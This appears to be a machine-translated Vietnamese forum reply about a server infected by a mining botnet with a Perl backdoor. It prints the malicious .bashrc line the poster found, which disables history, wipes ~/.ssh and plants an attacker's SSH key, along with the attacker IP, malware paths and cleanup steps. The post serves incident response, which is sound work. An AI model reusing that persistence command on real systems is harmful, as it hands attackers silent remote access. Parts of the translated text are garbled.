Điều tương tự cũng xảy ra với tôi, và tôi nhận thấy ngày hôm qua. Tôi đã kiểm tra tệp /var/log/syslog
và IP này (185.234.218.40) dường như đang tự động thực thi cronjobs.
Tôi đã kiểm tra nó trên http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) và nó có một số báo cáo. Những tập tin này đã được chỉnh sửa bởi trojan:
Tôi đã tìm thấy điều này ở cuối .bashrc
(được thực hiện mỗi khi bash được mở):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Nó đang xóa authorized_keys
tệp của bạn , đây là danh sách các khóa SSH được phép kết nối mà không cần mật khẩu. Sau đó, nó thêm khóa SSH của kẻ tấn công:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Hơn nữa, tôi tìm thấy thư mục này : /tmp/.X13-unix/.rsync
, nơi chứa tất cả các phần mềm độc hại. Tôi thậm chí đã tìm thấy một tệp, /tmp/.X13-unix/.rsync/c/ip
một tệp chứa 70 000 địa chỉ IP, rất có thể là các nạn nhân hoặc máy chủ nút khác.
Có 2 giải pháp: A:
Thêm tường lửa chặn tất cả các kết nối gửi ngoại trừ cổng 22 và các kết nối khác mà bạn thấy cần thiết và bật fail2ban, một chương trình cấm địa chỉ IP sau khi X thử mật khẩu không thành công
Giết tất cả các công việc định kỳ :
ps aux | grep cron
, sau đó tiêu diệt PID xuất hiện
Thay đổi mật khẩu của bạn thành một mật khẩu an toàn
B:
Sao lưu mọi tập tin hoặc thư mục mà bạn cần hoặc muốn
Đặt lại máy chủ và cài đặt lại Ubuntu hoặc trực tiếp tạo một giọt mới
Giống như Thom Wiggers đã nói, bạn chắc chắn là một phần của botnet khai thác bitcoin và máy chủ của bạn có cửa hậu . Cửa hậu sử dụng khai thác perl, một tệp nằm ở đây : /tmp/.X13-unix/.rsync/b/run
, chứa cái này ( https://pastebin.com/ceP2jsUy )
Các thư mục đáng ngờ nhất mà tôi tìm thấy là:
Cuối cùng, có một bài viết liên quan đến Cửa hậu Perl tại đây: https://blog.trendmicro.com/trendlabs-security-intellect/outlaw-hacking-groups-botnet-observed-s rảiing-miner-perl-based-backdoor
/
Tôi hy vọng bạn thấy nó hữu dụng.
.firefoxcatche
có lẽ không có gì để làm với firefox - đây có thể chỉ là một công cụ khai thác bitcoin không? Hãy thử tải lên các tệp thực thi lên virustotal.